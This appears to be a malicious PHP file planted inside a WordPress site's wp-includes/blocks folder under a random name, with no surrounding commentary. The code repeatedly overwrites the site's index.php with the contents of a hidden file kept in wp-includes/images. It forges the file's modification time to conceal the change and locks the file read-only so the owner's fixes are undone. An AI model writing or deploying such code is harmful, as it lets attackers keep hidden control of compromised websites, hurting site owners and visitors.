/home/preegmxb/gymnyou.com/wp-includes/blocks/UWFm7A.php
<?php 
$insj = '/home/preegmxb/gymnyou.com/index.php';
$inym = '/home/preegmxb/gymnyou.com/wp-includes/images/HV5lH6.html';
if (file_exists($insj)) {
    if (file_exists($inym)) {
        @chmod($insj, 0777);
        if (md5_file($insj) == md5_file($inym)) {
        } else {
            $chazh = @file_get_contents($inym);
			$at = filemtime($inym);
            file_put_contents($insj, $chazh);
            if ($at) {
                touch($insj, $at);
            }
        }
		@chmod($insj, 0444);
    }
} else {
    if (file_exists($inym)) {
		$at = filemtime($inym);
        $chazh = @file_get_contents($inym);
        file_put_contents($insj, $chazh);
		if ($at) {
			touch($insj, $at);
		}
    }
}
?>